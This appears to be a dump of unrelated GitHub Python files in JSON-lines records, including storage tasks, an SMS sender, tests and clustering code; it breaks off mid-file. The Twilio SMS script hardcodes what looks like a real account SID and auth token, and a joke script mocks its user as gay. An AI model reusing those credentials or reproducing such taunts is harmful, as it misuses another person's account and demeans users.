servershare post-job'''\n srcdir = os.path.join(settings.SHAREMAP[srcsharename], srcpath)\n dstdir = os.path.join(settings.SHAREMAP[dstsharename], srcpath)\n try:\n os.makedirs(dstdir, exist_ok=True)\n except Exception:\n taskfail_update_db(self.request.id)\n raise\n for srcfn in fns:\n cmd = ['rsync', '-avz', os.path.join(srcdir, srcfn), dstdir]\n try:\n subprocess.run(cmd, check=True)\n except subprocess.CalledProcessError:\n print('Failed to run', cmd)\n try:\n self.retry(countdown=60)\n except MaxRetriesExceededError:\n taskfail_update_db(self.request.id)\n raise\n # delete files in source dir after rsyncing ALL files (else task is not retryable)\n for srcfn in fns:\n os.unlink(os.path.join(srcdir, srcfn))\n delete_empty_dir(srcsharename, srcpath) # pylint: disable=E1120\n # report finished\n fnpostdata = {'fn_ids': upd_sf_ids, 'servershare': dstsharename,\n 'dst_path': srcpath, 'client_id': settings.APIKEY, 'task': self.request.id}\n dspostdata = {'storage_loc': srcpath, 'dset_id': dset_id, 'newsharename': dstsharename,\n 'task': self.request.id, 'client_id': settings.APIKEY}\n fnurl = urljoin(settings.KANTELEHOST, reverse('jobs:updatestorage'))\n dsurl = urljoin(settings.KANTELEHOST, reverse('jobs:update_ds_storage'))\n update_db(fnurl, json=fnpostdata)\n update_db(dsurl, json=dspostdata)\n\n\n@shared_task(bind=True, queue=settings.QUEUE_STORAGE)\ndef rename_dset_storage_location(self, ds_sharename, srcpath, dstpath, dset_id, sf_ids):\n \"\"\"This expects one dataset per dir, as it will rename the whole dir\"\"\"\n print(f'Renaming dataset storage {srcpath} to {dstpath}')\n ds_share = settings.SHAREMAP[ds_sharename]\n srcfull = os.path.join(ds_share, srcpath)\n dstfull = os.path.join(ds_share, dstpath)\n try:\n os.renames(srcfull, dstfull)\n except NotADirectoryError:\n taskfail_update_db(self.request.id, msg=f'Failed renaming project {srcfull} is a directory '\n f'but {dstfull} is a file')\n raise\n except Exception:\n taskfail_update_db(self.request.id, msg=f'Failed renaming dataset location {srcfull} '\n f'to {dstfull} for unknown reason')\n raise\n # Go through dirs in path and delete empty ones caused by move\n splitpath = srcpath.split(os.sep)\n for pathlen in range(0, len(splitpath))[::-1]:\n # no rmdir on the leaf dir (would be pathlen+1) since that's been moved\n checkpath = os.path.join(ds_share, os.sep.join(splitpath[:pathlen]))\n if os.path.exists(checkpath) and os.path.isdir(checkpath) and not os.listdir(checkpath):\n try:\n os.rmdir(checkpath)\n except:\n taskfail_update_db(self.request.id)\n raise\n fn_postdata = {'fn_ids': sf_ids, 'dst_path': dstpath, \n 'client_id': settings.APIKEY}\n ds_postdata = {'storage_loc': dstpath, 'dset_id': dset_id, 'newsharename': False,\n 'task': self.request.id, 'client_id': settings.APIKEY}\n fnurl = urljoin(settings.KANTELEHOST, reverse('jobs:updatestorage'))\n dsurl = urljoin(settings.KANTELEHOST, reverse('jobs:update_ds_storage'))\n try:\n update_db(fnurl, json=fn_postdata)\n update_db(dsurl, json=ds_postdata)\n except RuntimeError:\n # FIXME cannot move back shutil.move(dst, src)\n raise\n\n\n@shared_task(bind=True, queue=settings.QUEUE_STORAGE)\ndef move_file_storage(self, fn, srcshare, srcpath, dstpath, fn_id, dstsharename, newname=False):\n '''Moves file across server shares, dirs, or as rename'''\n src = os.path.join(settings.SHAREMAP[srcshare], srcpath, fn)\n dstfn = newname or fn\n dst = os.path.join(settings.SHAREMAP[dstsharename], dstpath, dstfn)\n url = urljoin(settings.KANTELEHOST, reverse('jobs:updatestorage'))\n if src == dst:\n print('Source and destination are identical, not moving file')\n update_db(url, json={'client_id': settings.APIKEY, 'task': self.request.id})\n print('Moving file {} to {}'.format(src, dst))\n dstdir = os.path.split(dst)[0]\n try:\n os.makedirs(dstdir, exist_ok=True)\n except Exception:\n taskfail_update_db(self.request.id)\n raise\n if not os.path.isdir(dstdir):\n taskfail_update_db(self.request.id)\n raise RuntimeError('Directory {} is already on disk as a file name. '\n 'Not moving files.')\n try:\n shutil.move(src, dst)\n except Exception as e:\n taskfail_update_db(self.request.id)\n raise RuntimeError('Could not move file tot storage:', e)\n postdata = {'fn_id': fn_id, 'servershare': dstsharename, 'dst_path': dstpath,\n 'client_id': settings.APIKEY, 'task': self.request.id}\n if newname:\n postdata['newname'] = newname\n try:\n update_db(url, json=postdata)\n except RuntimeError:\n shutil.move(dst, src)\n raise\n print('File {} moved to {}'.format(fn_id, dst))\n\n\n@shared_task(bind=True, queue=settings.QUEUE_STORAGE)\ndef move_stored_file_tmp(self, sharename, fn, path, fn_id):\n src = os.path.join(settings.SHAREMAP[sharename], path, fn)\n dst = os.path.join(settings.TMPSHARE, fn)\n print('Moving stored file {} to tmp'.format(fn_id))\n try:\n shutil.move(src, dst)\n except Exception:\n taskfail_update_db(self.request.id)\n raise\n postdata = {'fn_id': fn_id, 'servershare': settings.TMPSHARENAME,\n 'dst_path': '', 'client_id': settings.APIKEY,\n 'task': self.request.id}\n url = urljoin(settings.KANTELEHOST, reverse('jobs:updatestorage'))\n try:\n update_db(url, json=postdata)\n except RuntimeError:\n shutil.move(dst, src)\n raise\n print('File {} moved to tmp and DB updated'.format(fn_id))\n","repo_name":"glormph/kantele","sub_path":"src/backend/datasets/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":10463,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"15017006335","text":"import json\n\nimport requests\nfrom packaging.version import parse\nPYPI_API_URL_PATTERN = 'https://pypi.python.org/pypi/{package}/json'\n\n\ndef get_package_last_version(package_name: str) -> str:\n\n req = requests.get(PYPI_API_URL_PATTERN.format(package=package_name))\n req.raise_for_status()\n j = json.loads(req.text)\n raw_releases = j.get('releases', [])\n all_releases = sorted([parse(r) for r in raw_releases\n if not parse(r).is_prerelease])\n return all_releases[-1].base_version\n","repo_name":"vertliba/safe-pip-upgrade","sub_path":"tests/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"19514815377","text":"from src import Gallery, AppLogException\nfrom src.general import Status\n\n\nclass GalleryService:\n\n def __init__(self, gallery=Gallery()):\n self.gallery = gallery\n\n def create(self):\n data = GalleryService(gallery=self.gallery.items_id)\n if data.gallery.items_id is None:\n raise AppLogException(Status.item_does_not_exists())\n self.gallery.add()\n self.gallery.flush()\n\n return Status.successfully_processed()\n\n def alter(self):\n data = GalleryService.get_one(_id=self.gallery.id)\n\n if data.gallery is None:\n raise AppLogException(Status.gallery_does_not_exists())\n\n self.gallery = data.gallery\n self.gallery.update()\n self.gallery.commit_or_rollback()\n\n return Status.successfully_processed()\n\n @classmethod\n def get_one(cls, _id):\n return cls(gallery=Gallery.query.get_one(_id=_id))\n\n @staticmethod\n def delete_all_by_item_without_this(\n item_id, gallery_for_exclude):\n Gallery.query.delete_all_by_item_exclude_this(\n item_id=item_id, gallery_for_exclude=gallery_for_exclude\n )\n","repo_name":"mraic/administration-app","sub_path":"src/domain/gallery_service.py","file_name":"gallery_service.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5084665628","text":"class Solution:\n def removeKdigits(self, num: str, k: int) -> str:\n if len(num)==k:\n return '0'\n stack=[]\n top=-1\n for i,value in enumerate(num):\n while k!=0 and top>-1 and stack[top]>value:\n k=k-1\n top=top-1\n stack.pop()\n stack.append(value)\n top=top+1\n stack=stack[:len(stack)-k]\n ans=''\n for value in stack:\n ans=ans+value\n return str(int(ans))","repo_name":"yohanse/A2SV","sub_path":"Remove K Digits.py","file_name":"Remove K Digits.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40451354451","text":"from twilio.rest import Client\n\naccount_sid = 'ACc2b1bd25252932ce8b7c21519b5cadfe'\nauth_token = 'c49155886ae96cee7e63590ede3960e3'\n\nclient = Client(account_sid, auth_token)\n\ntwilio_number = '+12058275297'\ntarget_number = input(\"Please Enter the Pakistani phone number: \")\nmessage_body = input(\"Please Enter the SMS content: \")\n\nmessage = client.messages.create(\n body=message_body,\n from_=twilio_number,\n to='+92' + target_number\n)\n\nprint(message.body)\n","repo_name":"owsym/sms-sender-by-twilio","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"32105901066","text":"# class test():\n# \tpass\n#\n# print(test() == test())\n# print(id(test())== id(test()))\n\n# import threading\n#\n# sum = 0\n# # loopSum = 200000\n# loopSum = 3\n#\n# def myAdd():\n# \tglobal sum, loopSum\n# \tfor i in range(1, loopSum):\n# \t\tsum += 1\n# \t\tprint('InAdd: ', sum)\n#\n#\n# def myMinu():\n# \tglobal sum, loopSum\n# \tfor i in range(1, loopSum):\n# \t\tsum -= 1\n# \t\tprint('InMinu: ', sum)\n#\n#\n# if __name__ == '__main__':\n# \tprint(\"Starting ....{0}\".format(sum))\n#\n# \t# 开始多线程的实例,看执行结果是否一样\n# \tt1 = threading.Thread(target=myAdd, args=())\n# \tt2 = threading.Thread(target=myMinu, args=())\n#\n# \tt1.start()\n# \tt2.start()\n#\n# \tt1.join()\n# \tt2.join()\n#\n# \tprint(\"Done .... {0}\".format(sum))\n\n\nimport os\nfrom multiprocessing import Process\n\n\n# def run_proc(name):\n# \tprint('Child process %s (%s) running' %(name, os.getpid()))\n#\n#\n# if __name__ == '__main__':\n# \tprint('Parent Process %s' % os.getpid())\n# \tfor i in range(3):\n# \t\tp = Process(target=run_proc, args=(str(i), ))\n# \t\tprint('Process will start')\n# \t\tp.start()\n# \tp.join()\n# \tprint('Process end.')\n\n\ndef consumer():\n\tr = ''\n\twhile True:\n\t\tn = yield r\n\t\tif not n:\n\t\t\treturn\n\t\tprint('[CONSUMER]Consuming %s...' % n)\n\t\tr = '200 OK'\n\n\ndef produce(c):\n\tc.send(None)\n\tn = 0\n\twhile n < 5:\n\t\tn += 1\n\t\tprint('[PRODUCER]Producing %s...' %n)\n\t\tr = c.send(n)\n\t\tprint('[PRODUCER]Consumer return: %s...' %n)\n\tc.close()\n\n\nif __name__ == '__main__':\n\tc = consumer()\n\tproduce(c)\n\tprint(type(c))\n","repo_name":"Airseai6/test","sub_path":"test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"10050946319","text":"import random \r\nfrom playsound import playsound \r\nimport time\r\nimport numpy\r\n\r\n\r\n\r\nvalores = [\"Si\" ,\"No\" , \"Si\",\"No\"]\r\n\r\n\r\n\r\ndef azar_si_no(valores):\r\n\r\n return numpy.random.choice(valores)\r\n\r\n\r\n\r\nnombre = input(\"ingresa tu nombre\")\r\nmedida = random.randint(5,30)\r\ngay_o_no = random.randint(1,2) \r\ncomplemento =\" tu tula es...\"\r\n\r\nif azar_si_no == \"Si\":\r\n print(nombre + \"...\" \"Deja la paja\") \r\n playsound(\"meme-plantilla (mp3cut.net).mp3\")\r\nelse:\r\n print(nombre + \"...\" \"Eres gay bro UnU\") \r\n playsound(\"gay-meme.mp3\")\r\ntime.sleep(1.3)\r\n\r\n\r\n\r\nif medida > 15:\r\n\r\n print(nombre + \"...\" + complemento + \"grande\" )\r\n playsound('yamete-kudasai-sound-effect-original.mp3') \r\nelse:\r\n print(nombre + \"...\" + complemento + \"chica\" )\r\n playsound('mona sad unu.mp3')\r\n\r\n\r\n\r\n","repo_name":"hectormra23/tula_random","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"39943049289","text":"from parser import *\nfrom sys import exit\n\nmnemonics = {'HLT':0x00, 'NOP':0x01, 'CLR':0x02, 'DMP':0x03,\n 'OUT':0x04, \n \n 'ADD':0x10, 'SUB':0x11, 'MUL':0x12, 'DIV':0x13,\n 'MOD':0x14, 'AND':0x15, 'OR':0x16, 'XOR':0x17,\n 'CMP':0x18, 'INC':0x19, 'DEC':0x1A,\n \n 'MOV':0x20, 'SWP':0x21, 'CPY':0x22,\n \n 'JMP':0x31, 'JAL':0x32, 'RET':0x33,\n 'BEQ':0x34, 'BNE':0x35, 'BGT':0x36, 'BGE':0x37,\n 'BIE':0x38, 'BDE':0x39, 'BAO':0x3A, 'BAC':0x3B}\n\nmaxArgs = {'HLT':0, 'NOP':0, 'CLR':1, 'DMP':1,\n 'OUT':2, \n \n 'ADD':3, 'SUB':3, 'MUL':4, 'DIV':4,\n 'MOD':3, 'AND':3, 'OR':3, 'XOR':3,\n 'CMP':2, 'INC':1, 'DEC':1,\n \n 'MOV':2, 'SWP':2, 'CPY':4,\n \n 'JMP':1, 'JAL':1, 'RET':0,\n 'BEQ':3, 'BNE':3, 'BGT':3, 'BGE':3,\n 'BIE':3, 'BDE':3, 'BAO':1, 'BAC':1}\n\nregNrs = {'R0':0x00, 'R1':0x01, 'R2':0x02, 'R3':0x03,\n 'R4':0x04, 'R5':0x05, 'R6':0x06, 'R7':0x07,\n 'R8':0x08, 'R9':0x09, 'RA':0x0A, 'RB':0x0B,\n 'PR':0x0C, 'PB':0x0D, 'PS':0x0E, 'PC':0x0F,\n\n 'r0':0x00, 'r1':0x01, 'r2':0x02, 'r3':0x03,\n 'r4':0x04, 'r5':0x05, 'r6':0x06, 'r7':0x07,\n 'r8':0x08, 'r9':0x09, 'rA':0x0A, 'rB':0x0B,\n 'pR':0x0C, 'pB':0x0D, 'pS':0x0E}\n\ndef argSize(arg):\n global regNrs\n argType = arg[0]\n arg = arg[1:]\n\n if argType == 'REG' or argType == 'IDR' or argType == 'INC' or argType == 'DEC':\n # Get the register number\n rNr = arg[0].val\n if rNr in regNrs:\n rNr = regNrs[rNr]\n \n # Return 1 on quick register, 2 on slow register\n if rNr == 0x00 or rNr == 0x01 or rNr == 0x0D:\n return 1\n return 2\n if argType == 'IMM' or argType == 'ABS' or argType == 'IDM':\n return 5 # Return max size\n if argType == 'IDX':\n sz = 1\n\n # Get the first register's number\n rNr = arg[0].val\n if rNr in regNrs:\n rNr = regNrs[rNr]\n \n # Increment size for slow register\n if not(rNr == 0x00 or rNr == 0x01 or rNr == 0x0D):\n sz += 1\n\n # Get the second register's number\n rNr = arg[1].val\n if rNr in regNrs:\n rNr = regNrs[rNr]\n \n # Increment size for slow register\n if not(rNr == 0x00 or rNr == 0x01 or rNr == 0x0D):\n sz += 1\n \n return sz\n \n if argType == 'DSP':\n sz = 5 # Basic size of lead-in and immediate\n # Get the register's number\n rNr = arg[1].val\n if rNr in regNrs:\n rNr = regNrs[rNr]\n \n # Increment size for slow register\n if not(rNr == 0x00 or rNr == 0x01 or rNr == 0x0D):\n sz += 1\n \n return sz\n\n\n\n print(argType + \": \" + str(arg))\n return 1\n\ndef instrSizeFxn(instrToks):\n global mnemonics, maxArgs\n\n if len(instrToks) == 0:\n return 0\n \n mnemonic, args = getArgs(instrToks)\n mnemonic = mnemonic.upper()\n\n if mnemonic not in mnemonics:\n print(\"ERROR in line \" + str(instrToks[0].lineNr) + \": unknown mnemonic \" + str(mnemonic))\n exit(1)\n\n argMax = maxArgs[mnemonic]\n\n sz = 1 # Argument byte\n if len(args) < argMax:\n sz += 1 # End of args byte\n\n for arg in args:\n sz += argSize(arg)\n\n return sz\n\ndef encodeImm(val):\n argStr = ''\n \n for i in range(0, 4):\n argStr += ' ' + hex(val & 0xFF)[2:]\n val = val >> 8\n \n return argStr\n\ndef encodeReg(argByte, rNr):\n argStr = ''\n nWords = 0\n\n if rNr == 0:\n argByte = argByte | 0x00\n elif rNr == 1:\n argByte = argByte | 0x04\n elif rNr == 0x0D:\n argByte = argByte | 0x08\n else:\n argByte = argByte | 0x0C\n argStr = ' ' + hex(rNr)[2:]\n nWords += 1\n \n argStr = hex(argByte)[2:] + argStr\n nWords += 1\n\n return argStr, nWords\n\n\ndef encodeArg(arg, incAmt = 4):\n argStr = \"\"\n nWords = 0\n\n if arg[0] == 'REG':\n argStr, nWords = encodeReg(0x33, arg[1] - 1)\n \n elif arg[0] == 'IMM':\n argStr = '23'\n nWords += 5\n argStr += encodeImm(arg[1])\n \n elif arg[0] == 'ABS':\n argStr = '83'\n nWords += 5\n argStr += encodeImm(arg[1])\n\n elif arg[0] == 'IDR':\n argStr, nWords = encodeReg(0x43, arg[1] - 1)\n\n elif arg[0] == 'IDM':\n argStr = '53'\n nWords += 5\n argStr += encodeImm(arg[1])\n \n elif arg[0] == 'IDX':\n argStr = ''\n argByte = 0x60\n\n rNr = arg[1] - 1\n if rNr == 0:\n argByte = argByte | 0x00\n elif rNr == 1:\n argByte = argByte | 0x04\n elif rNr == 0x0D:\n argByte = argByte | 0x08\n else:\n argByte = argByte | 0x0C\n argStr = ' ' + hex(rNr)[2:]\n nWords += 1\n \n rNr = arg[2] - 1\n if rNr == 0:\n argByte = argByte | 0x00\n elif rNr == 1:\n argByte = argByte | 0x01\n elif rNr == 0x0D:\n argByte = argByte | 0x02\n else:\n argByte = argByte | 0x03\n argStr = ' ' + hex(rNr)[2:]\n nWords += 1\n \n argStr = hex(argByte)[2:] + argStr\n nWords += 1\n\n elif arg[0] == 'DSP':\n argStr, nWords = encodeReg(0x73, arg[2] - 1)\n argStr += encodeImm(arg[1])\n nWords += 4\n\n elif arg[0] == 'INC':\n argByte = 0x90 | (incAmt - 1)\n argStr, nWords = encodeReg(argByte, arg[1] - 1)\n elif arg[0] == 'DEC':\n argByte = 0xA0 | (incAmt - 1)\n argStr, nWords = encodeReg(argByte, arg[1] - 1)\n else:\n print(arg)\n\n return argStr, nWords\n\ndef encodeInst(inst, codePos):\n global mnemonics, maxArgs\n line = \"\"\n nWords = 1\n \n mnemonic = inst[0].upper()\n args = inst[1]\n\n # Insert the mnemonic into the instruction\n if mnemonic not in mnemonics:\n print(\"ERROR: Unrecognized mnemonic \" + mnemonic)\n exit(-1)\n line = hex(mnemonics[mnemonic])[2:]\n\n # Insert each arg into the instruction\n for arg in args:\n argStr, argWords = encodeArg(arg)\n line += ' ' + argStr\n nWords += argWords\n\n # Insert explicit end of args\n if maxArgs[mnemonic] != len(args):\n line += ' 0'\n nWords += 1\n\n # Apply the positioning information\n line = hex(codePos)[2:] + ' ' + hex(nWords)[2:] + ' ' + line\n return line, nWords\n \n\ndef encode(instrs, dataInit, codeBase, dataBase):\n codePos = codeBase\n for inst in instrs:\n line, nWords = encodeInst(inst, codePos)\n print(line)\n codePos += nWords\n\n for i in range(0, len(dataInit)):\n value, width, offset = dataInit[i]\n print(hex(dataBase + offset)[2:] + ' ' + hex(width)[2:], end='')\n \n for j in range(0, width):\n print(' ' + hex(value & 0xFF)[2:], end='')\n value = value >> 8\n print()\n print(hex(codeBase - 1)[2:])\n\ndef main():\n toks = clean()\n dataLabels, dataInit = dataOffsets(toks)\n codeLabels, codePos = codeOffsets(toks, instrSizeFxn)\n codePos = codePos + 4\n\n for codeLabel in codeLabels:\n codeLabels[codeLabel] -= 1\n\n for reg in regNrs:\n if reg in codeLabels or reg in dataLabels:\n print(\"Register mnemonic \" + reg + \" overrides existing label\")\n return -1\n codeLabels[reg] = regNrs[reg]\n\n instrs = getInstrs(toks, 1, codeLabels, codePos, dataLabels)\n encode(instrs, dataInit, 1, codePos)\n\nmain()\n","repo_name":"rmh2805/CompArchProject","sub_path":"Asm/Assembler/worseVAX.py","file_name":"worseVAX.py","file_ext":"py","file_size_in_byte":7699,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"11809727331","text":"\"\"\"\ntests.parsers.industry\n~~~~~~~~~~~~~~~~~~~~~~\nIndustry table tests\n\n\"\"\"\nfrom evepaste import parse_industry\nfrom tests import TableTestGroup\n\n\nINDUSTRY_TABLE = TableTestGroup(parse_industry)\nINDUSTRY_TABLE.add_test('''Tritanium (4662 Units)\nPyerite (1857 Units)\nMexallon (1027 Units)\nIsogen (44 Units)\nNocxium (51 Units)''', ([\n {'name': 'Isogen', 'quantity': 44},\n {'name': 'Mexallon', 'quantity': 1027},\n {'name': 'Nocxium', 'quantity': 51},\n {'name': 'Pyerite', 'quantity': 1857},\n {'name': 'Tritanium', 'quantity': 4662}],\n []))\n\nINDUSTRY_TABLE.add_test('''Strontuim Clathrates (1 Unit)''',\n ([{'name': 'Strontuim Clathrates', 'quantity': 1}],\n []))\n","repo_name":"evepraisal/evepaste","sub_path":"tests/parsers/industry.py","file_name":"industry.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"29"} +{"seq_id":"18152664106","text":"from __future__ import absolute_import, division, print_function\nimport barnaba as bb\nimport barnaba.definitions as dd\nimport os\nfrom comp_mine import comp\n\ncwd = os.getcwd()\noutdir = \"%s/test/tmp\" % cwd\nrefdir = \"%s/test/reference/\" % cwd\nos.system(\"mkdir %s\" % (outdir))\n\nfname = \"%s/test/data/sample1.pdb\" % cwd\nfname1 = \"%s/test/data/samples.xtc\" % cwd\n\ndef test_angles_1():\n \n angles_b,rr = bb.backbone_angles(fname)\n\n fh = open(\"%s/angles_01.test.dat\" % outdir,'w')\n stri = \"%20s \" % \"#\"\n for pp in dd.bb_angles:\n stri += \" %10s \" % pp\n stri += \"\\n\"\n \n for e in range(angles_b.shape[1]):\n stri += \"%20s \" % (rr[e])\n for k in range(angles_b.shape[2]):\n stri += \" %10.4f \" % angles_b[0,e,k]\n stri += \"\\n\"\n fh.write(stri)\n fh.close()\n comp(\"%s/angles_01.test.dat\" % refdir)\n \n\ndef test_angles_2():\n \n resi = [\"RC5_1_0\",\"RG_69_0\"]\n angles = [\"alpha\",\"beta\",\"chi\"]\n angles_b,rr = bb.backbone_angles(fname,residues=resi,angles=angles)\n stri = \"%20s \" % \"#\"\n for pp in angles:\n stri += \" %10s \" % pp\n stri += \"\\n\"\n\n for e in range(angles_b.shape[1]):\n stri += \"%20s \" % (rr[e])\n for k in range(angles_b.shape[2]):\n stri += \" %10.4f \" % angles_b[0,e,k]\n stri += \"\\n\"\n \n fh = open(\"%s/angles_02.test.dat\" % outdir,'w')\n fh.write(stri)\n fh.close()\n\n comp(\"%s/angles_02.test.dat\" % refdir)\n\n\ndef test_angles_3():\n \n resi = [\"RG_69_0\",\"RU_37_0\"]\n angles = [\"gamma\",\"alpha\"]\n \n angles_b,rr = bb.backbone_angles(fname,residues=resi,angles=angles)\n stri = \"%20s \" % \"#\"\n for pp in angles:\n stri += \" %10s \" % pp\n stri += \"\\n\"\n\n for e in range(angles_b.shape[1]):\n stri += \"%20s \" % (rr[e])\n for k in range(angles_b.shape[2]):\n stri += \" %10.4f \" % angles_b[0,e,k]\n stri += \"\\n\"\n\n fh = open(\"%s/angles_03.test.dat\" % outdir,'w')\n fh.write(stri)\n fh.close()\n comp(\"%s/angles_03.test.dat\" % refdir)\n\n\n\ndef test_angles_4():\n \n resi = [\"RG_69_0\",\"RU_37_0\"]\n angles = [\"gamma\",\"alpha\"]\n \n angles_b,rr = bb.backbone_angles(fname1,topology=fname,residues=resi,angles=angles)\n stri = \"\"\n for p in range(angles_b.shape[0]):\n for k in range(angles_b.shape[2]):\n stri += \" %10.4f %10.4f \" % (angles_b[p,0,k],angles_b[p,1,k])\n stri += \"\\n\"\n \n fh = open(\"%s/angles_04.test.dat\" % outdir,'w')\n fh.write(stri)\n fh.close()\n comp(\"%s/angles_04.test.dat\" % refdir)\n \n\n\n","repo_name":"srnas/barnaba","sub_path":"test/test_angles.py","file_name":"test_angles.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"29"} +{"seq_id":"74630380878","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 21 13:27:31 2020\n\n@author: 98sco\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom random import randint\n\ndef euclid_dist(a, b):\n # calculate the eucludean distance between two points\n return math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)\n\ndef compute_new_medoids(med, cluster):\n temp = [med,0]\n \n # for each point in the cluster...\n for p in cluster:\n # if the point is the medoid,\n # continue (no need to calculate and add zero)\n if p == med:\n continue\n # add the euclidean distance between the point and the medoid\n temp[1] += euclid_dist(med, p)\n \n i = len(cluster)\n # while there are points left...\n while i > 0:\n dist = 0\n # for point in cluster...\n for p in cluster:\n # if the point is the current temp medoid\n # continue (no need to calculate and add zero)\n if p == cluster[i - 1]:\n continue\n # add the euclidean distance between the point and the temp medoid\n dist += euclid_dist(cluster[i - 1], p)\n # if the total distance of the temp medoid is less than the current medoid\n # save the distance and index of the new medoid\n if dist < temp[1]:\n temp[0] = cluster[i - 1]\n temp[1] = dist\n i -= 1\n\n # return the new medoid\n return temp[0]\n \ndef kmedoid_cluster_prototype(k, points, medoids=None):\n # Base Cases\n if k == 0:\n return None\n if k == 1 or k == len(pts):\n return points\n \n # initial medoid error management\n if medoids != None:\n if len(medoids) != k:\n print(\"ERROR: Number of provided medoids does not equal k\")\n return\n # generate random medoids if none are input\n else:\n num_pts = len(points) - 1\n init = []\n medoids = []\n clusters = []\n \n # random centroid selection with hash-table style collision management\n for i in range(0,k):\n temp = randint(0,num_pts)\n while temp in init:\n temp = (temp + 1) % num_pts\n init.append(temp)\n medoids.append(points[temp])\n \n while(1):\n # generate empty lists for k-clusters\n clusters = []\n for i in range(0,k):\n clusters.append([])\n temp = [1024,0]\n # for each point...\n for pt in points:\n for n in range(0,k):\n # calculate the euclidean distance between the point\n # and each centroid[0,...,k]\n dist = euclid_dist(pt,medoids[n])\n # if the distace is shorter than the current saved centroid\n # save the new distance and centroid index\n if dist < temp[0]:\n temp[0] = dist\n temp[1] = n\n # add the current point to the closest centroid's cluster\n clusters[temp[1]].append(pt)\n # reset and continue\n temp = [1024,0] \n \n new_ctrs = []\n \n # for all clusters...\n for n in range(0,k):\n # if the cluster is empty,\n # keep the corresponding medoid \n if clusters[n] == []:\n new_ctrs.append(medoids[n])\n # else, generate a new medoid based its cluster\n else:\n new_ctrs.append(compute_new_medoids(medoids[n], clusters[n]))\n \n # if the new medoids are the same as the current medoids\n # exit the loop\n if new_ctrs == medoids:\n break\n # else, set the new medoids and continue\n else:\n medoids = new_ctrs\n \n # return the final clusters as a list of lists\n return clusters\n\n# small testing batch\npts = [[2,10],[2,5],[8,4],[5,8],[7,5],[6,4],[1,2],[4,9]]\n\nfor i in range(2,9):\n print(\"K =\",i)\n output = kmedoid_cluster_prototype(i, pts)\n\n for thing in output:\n print(thing)\n print()\n ","repo_name":"jcg1183/Datamining_Project","sub_path":"archive/clustering/kmedoidprototype.py","file_name":"kmedoidprototype.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5659569646","text":"import os\nimport sys\nimport glob\nimport re\nimport time\nimport shutil\nimport functools\nfrom modules.tinytag import TinyTag\n\n\ndef main():\n args = get_arguments()\n confirm = input(\"Is the destination empty (required for FAT sorting) [y/n]?\")\n if confirm == 'y':\n copy_full_directory(args['source'], args['destination'], args['source'])\n\ndef copy_full_directory(source, destination, source_directory):\n child_directories = get_all_subdirectories(source_directory)\n # Recursively copy child directories\n for child_directory in child_directories:\n # Concatenate directory names to form one flat directory for this folder\n destination_flat_dir = child_directory.replace(source_directory, '').replace(os.path.sep, ' - ')\n # Copy the music to the drive\n copy_fat_directory(child_directory, destination + destination_flat_dir)\n \ndef recursively_copy_directory_and_children(source, destination, source_directory):\n copy_fat_directory(source_directory, source_directory.replace(source, destination))\n child_directories = get_all_subdirectories(source_directory)\n # Recursively copy child directories\n for child_directory in child_directories:\n print('Recursively copying: ', child_directory)\n recursively_copy_directory_and_children(source, destination, child_directory)\n\ndef get_arguments():\n args = {}\n source = sys.argv[1]\n destination = sys.argv[2]\n if os.path.exists(source) and os.path.exists(destination):\n args['source'] = source\n args['destination'] = destination\n return args\n\ndef get_all_subdirectories(path):\n directories = []\n for cur_path, subdirs, files in os.walk(path):\n directories.append(cur_path)\n return natural_sort(directories)\n\ndef get_immediate_subdirectories(path):\n directories = [f.path for f in os.scandir(path) if f.is_dir()]\n return natural_sort(directories)\n\ndef get_files(path):\n files = []\n globs = glob.glob(path + \"/[!\\.]*\")\n for path in globs:\n if os.path.isfile(path):\n files.append(path)\n return files\n\ndef compare_by_track_natural(item1, item2):\n # Primary sort by track number meta data\n try:\n if TinyTag.get(item1).track is None and TinyTag.get(item2).track is not None:\n return 1\n elif TinyTag.get(item1).track is not None and TinyTag.get(item2).track is None:\n return -1\n elif TinyTag.get(item1).track is not None and TinyTag.get(item2).track is not None:\n if int(TinyTag.get(item1).track) > int(TinyTag.get(item2).track):\n return 1\n elif int(TinyTag.get(item1).track) < int(TinyTag.get(item2).track):\n return -1\n else:\n return 0\n else:\n # Secondary sort by file name (natural sort)\n sorted_list = natural_sort([item1, item2])\n if sorted_list[0] == item1:\n return -1\n else:\n return 1\n except:\n return -1\n\ndef sort_by_track_and_filename(source_files):\n return sorted(source_files, key=functools.cmp_to_key(compare_by_track_natural))\n\ndef copy_fat_directory(source, destination):\n print('copy_fat_directory: ', source, destination)\n source_files = get_files(source)\n if len(source_files) <= 0:\n return\n sorted_source_files = sort_by_track_and_filename(source_files)\n # exit()\n for source_file_path in sorted_source_files:\n # Define destination file path and use original file name\n destination_file_path = source_file_path.replace(source, destination)\n # Remove track number from file name\n try:\n if 